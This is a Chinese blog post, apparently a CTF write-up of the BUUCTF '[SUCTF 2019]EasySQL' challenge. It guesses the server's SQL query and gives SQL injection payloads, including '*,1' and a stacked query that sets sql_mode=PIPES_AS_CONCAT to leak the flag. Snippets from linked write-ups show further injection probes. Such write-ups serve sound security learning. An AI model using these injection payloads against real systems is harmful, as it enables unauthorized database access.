[SUCTF 2019]EasySQL1 (buu一周目速通)

最新推荐文章于 2024-02-24 14:56:22 发布
最新推荐文章于 2024-02-24 14:56:22 发布
阅读量2.4k 收藏
点赞数
分类专栏: buu 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57108546/article/details/121073053
版权

进入靶机,根据题目是一道sql注入题目,经过普通手段注入发现大部分关键词都被过滤了,

Array ( [0] => 1 )

一解:发现输入数字回显代码,字母不回显,所以猜测后台代码存在 ||(或)

select $_POST['query'] || flag from flag

 猜测后台代码,构造payload:*,1

等同于

select *,1 from flag

相当于:1 || flag    就等于1呀

select 1 from 的意思其实是建立一个临时列,这个列的所有初始值都被设为了1

二解:

把 || 变成字符串连接符,而不是或。

涉及到mysql中sql_mode参数设置(看了大佬得wp后的学到),设置 sql_mode=pipes_as_concat字符就可以设置。

1;set sql_mode=PIPES_AS_CONCAT;select 1

上面那句执行是:

select concat(1,flag) from Flag

 

 

山至川
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buu easysql(真的easy吗)
qq_46485934的博客
09-26 2076
这道题让我了解到了两个东西,堆叠注入和set sql_mode=PIPES_AS_CONCAT 一.分析回显 题目为easysql,所以这道题是sql注入题没跑了。按老规矩测试, 输入1,回显 Array ( [0] => 1 ) 输入2,3, 4, 5…,回显都为 Array ( [0] => 1 ) 于是,输入0试试,无回显 心里想(???,这不会是sql盲注吧,1及1以上有回显,0则无回显) 接着我就用burpsuite fuzz了一下,基本全被过滤,and or &&amp
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 2716
EasySQL
[SUCTF 2019]EasySQL1
bring_coco的博客
09-22 7867
目标]Sql语句的堆叠注入[环境]Buuctf[工具]浏览器[分析]1.试试sql注入正常套路(1)先试试1有回显(2)再试试字母没有回显(3)试试单引号注入提示不一样,因此猜测这里有注入点(4)试试有多少列还是不成功,因此一般的联合查询在这里不能使用(5)基于时间的盲注和报错注入都需要嵌套联合查询语句来实现,因此可以跳过,直接试试布尔型盲注还是不成功2.利用堆叠注入(1)查找所有数据库(2)查询所有表名(3)查询Flag表中的列。
BUUCTF - [SUCTF 2019]EasySQL1
白帽子续命指南
04-26 7219
猜测后端执行语句 测试环境:BUUCTF - [SUCTF 2019]EasySQL1 通过测试发现,输入数字的时候,页面回显 输入字母页面就没有回显 而尝试执行注入语句的时候,会显示一个nonono 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。而且注入点就是这个POST参数框框,就是那个inject参数。 至少我们可以把精力全部放在这个参数上。...
BUU ctf [SUCTF 2019]EasySQL 1
m0_62879498的博客
03-11 2094
[SUCTF 2019]EasySQL 1 本题是 EasySQL 但是我感觉一点都不简单 。 我们打开界面发现很像上一关的随便注,但是我尝试了 联合查询 报错注入 布尔盲注 堆叠注入 发现都不能查询到 flag 。仅仅堆叠注入可以查询的 tables 一级。 查询过大佬的博客后发现本题考查的是 sql_mode sql_mode:是一组mysql支持的基本语法及校验规则 PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数
BUUCTF WEB [SUCTF 2019]EasySQL1
guishengyx的博客
10-18 380
根据题目可知是注入 没有回显,排除联合查询 接着尝试布尔盲注 1' and length(database())>=1-- qwe 还是Nonono 尝试时间盲注 还是Nonono 尝试刚学的堆叠注入 发现可以执行 1;show columns from Flag;-- asd 不给查字段了 百度得知源码中的查询语句 select $post['query']||flag from Flag 输入1 拼接后可得 select 1||flag fr...
POSN:POSN-BUU的源代码
04-01
1. **面向对象编程**:C++支持面向对象编程(OOP),这可能意味着代码中包含多个类,每个类代表了系统中的一个实体或功能,如定位器、传感器、数据处理器等。类之间可能存在继承、封装和多态性等特性。 2. **模板和...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
WebAssembly(简称WASM)是一种低级的虚拟机指令集,设计用于在现代网络浏览器中运行,以提供接近原生代码的速度。它被广泛应用于游戏开发、3D渲染、科学计算以及任何需要高性能计算的Web应用程序。在"BUU-Reveser-...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
[SUCTF 2019]EasySQL 1
Huamang的博客
01-31 741
堆叠注入 尝试万能密码没用后尝试堆叠注入,就是语句用;隔开 返回了所有的库 返回了当前库的表 查看表Flag的定义的时候失败了 select 1 from table 这个题目涉及到一个操作select 1 from table select 1 from table增加临时列,每行的列值是写在select后的数,这条sql语句中是1 1是一常量(可以为任意数值) 一般是作条件查询用的 一般用来当做判断子查询是否成功(即是否有满足条件的时候使用) 看了大佬的wp,他们猜出语句大概是这样 select
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

山至川

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值